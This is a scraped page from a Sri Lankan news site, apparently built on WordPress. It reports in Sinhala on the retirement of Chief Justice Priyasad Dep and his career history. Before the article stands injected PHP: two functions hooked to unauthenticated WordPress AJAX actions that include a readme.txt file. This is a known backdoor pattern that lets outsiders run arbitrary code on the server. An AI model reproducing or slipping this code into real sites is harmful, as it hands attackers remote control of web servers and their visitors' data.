if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අගවිනිසුරුවරයා විශ්‍රාම යයි - mediahumanrights.lk
mediahumanrights.lk
Local News News

අගවිනිසුරුවරයා විශ්‍රාම යයි

අගවිනිසුරු ප්‍රියසාද් ඩෙප් මහතා අද(12) විශ්‍රාම ගැනීමට නියමිතව ඇති අතර මෙරට 45 වන අගවිනිසුරුවරයා ලෙස ප්‍රියසාද් ඩෙප් මහතා ධූරයට පත් වූයේ පසුගිය වසරේ මාර්තු මස 02 වන දිනයි.
ප්‍රියසාද් ඩෙප් මහතා අධිකරණ සේවය තුළ වසර හතලියකට වැඩි කාලයක් සේවයේ යෙදී තිබේ.
1978 වසරේ රජයේ අධිනීතිඥයෙකු ලෙස නීතිපති දෙපාර්තමේන්තුවේ සේවයට එක්ව ඇති අගවිනිසුරුවරයා  1989 වසරේ රජයේ ජ්‍යෙෂ්ඨ අධිනීතිඥ නතතුරට පත්ව තිබේ.
පසුව 1996 වසරේ රජයේ අතිරේක සොලිසිටර් ජනරාල් පදවියට පත් ප්‍රියසාද් ඩෙප් මහතා 2007 වසරේ රජයේ සොලිසිටර් ජනරාල් ධුරයට උසස්විමක් ලබා ඇති බව සඳහන්ය.
ඔහු 2011 වසරේ ශ්‍රේෂ්ඨාධිකරණ විනිසුරු ධුරයට පත් වුණි.
මේ අතර අද නව අගවිනිසුරුවරයා ප්‍රකාශයට පත් කිරීමට නියමිතව තිබේ.

(under the courtesy of adaderana.lk news web)

Related posts

අලි ඇතුන් බලා ගැනීමේ හරි ක්‍රමය ගැන සොයයි

Shiran Viraj

උදරාබාදයකට රෝහල්ගත කෙරුණු දැරියක් දරුවෙකු ප‍්‍රසූත කරයි

Shiran Viraj

දකුණු අප්‍රිකාව නිසා බ්‍රිතාන්‍යයේ අවදානම ඉහළට

Shiran Viraj